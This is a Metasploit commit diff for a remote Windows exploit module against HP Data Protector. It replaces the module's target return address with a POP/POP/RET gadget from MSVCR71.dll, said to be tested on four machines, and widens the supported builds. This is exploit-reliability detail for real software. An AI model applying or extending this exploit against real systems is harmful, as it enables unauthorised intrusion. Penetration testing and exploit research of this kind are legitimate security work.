Change to a better P/P/R, tested on 4 different machines. Thx fdiskyou.
git-svn-id: file:///home/svn/framework3/trunk@13081 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
b6e1c6a967
commit
dbd04d754a
|
@ -47,9 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'HP Data Protector A.06.10: INET, internal build 611',
|
[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',
|
||||||
{
|
{
|
||||||
'Ret' => 0x0044673a
|
#POP/POP/RET from OmniBack\bin\MSVCR71.dll
|
||||||
|
'Ret' => 0x7c35630d
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
|
|
Loading…
Reference in New Issue